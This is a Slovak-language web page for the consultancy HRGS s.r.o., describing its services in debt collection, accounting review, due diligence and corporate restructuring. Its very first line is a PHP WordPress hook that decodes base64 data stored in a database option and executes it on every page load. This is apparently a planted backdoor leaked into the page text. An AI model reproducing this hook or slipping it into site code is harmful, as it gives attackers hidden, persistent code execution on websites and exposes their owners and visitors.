add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); HRGS s.r.o. | The best or nothing. Poradenstvo

Poradenstvo

Poradenská činnosť predstavuje jednu z hlavných činností vykonávaných pre klientov spoločnosti HRGS s.r.o.. Poradenstvo sa zaoberá riešením predinkasného, inkasného a poinkasného servisu, zahŕňajúceho audit potenciálnych obchodných partnerov klientov, cez ich pravidelný monitoring, vymáhanie pohľadávok zákonom prípustnými formami, postúpenia pohľadávok a súčasne riešenie krízových situácií klientov s ohľadom na charakter problému, predovšetkým reálnou, resp. formálnou reštrukturalizáciou spoločností klientov, za účelom dosiahnutia hospodárskeho rastu klientov.

Pri poradenstve v ekonomickej činnosti, zabezpečujeme posúdenie účtovných postupov s ohľadom na dodržanie postupov účtovania a zákona o účtovníctve (praktická aplikácia pri zmene účtovníka resp. účtovnej firmy), zisťovacia služba odvodená od audítorských postupov, ďalej optimalizácia zvolených účtovných postupov s ohľadom na daň z príjmu (agresívne vs. konzervatívne daňové prístupy), tiež posúdenie účtovníctva pri preberaní (odkúpení) v preberanej účtovnej jednotke (ekonomický due dilligence na strane kupujúceho) a vypracovanie podkladov pre záujemcov o kúpu účtovnej jednotky (ekonomický due dilligence na strane predávajúceho).

Pre úspešný chod spoločnosti klienta štandardne zabezpečujeme optimalizáciu fixných nákladov firmy a vypracúvame motivačné a odmeňovacie schémy a smernice, za účelom zefektívnenia činností zamestnancov a zvýšenie efektivity práce performance managerov. Významnú zložku poradenskej činnosti spoločnosti HRGS s.r.o. tvorí predovšetkým v ostatných rokoch poradenská činnosť v oblasti reštrukturalizácie záväzkov, vykonávaná v súlade so Zákonom o konkurze a reštrukturalizácii, pri ktorej za účasti reštrukturalizačného správcu a pod súdnou ochranou pred individuálnym vymáhaním pohľadávok zo strany veriteľov klienta, zabezpečujeme zníženie záväzkov a/alebo odklad splatnosti záväzkov, za účelom preklenutia nepriaznivej ekonomickej situácie klienta.

Scroll to Top
Prejsť na panel nástrojov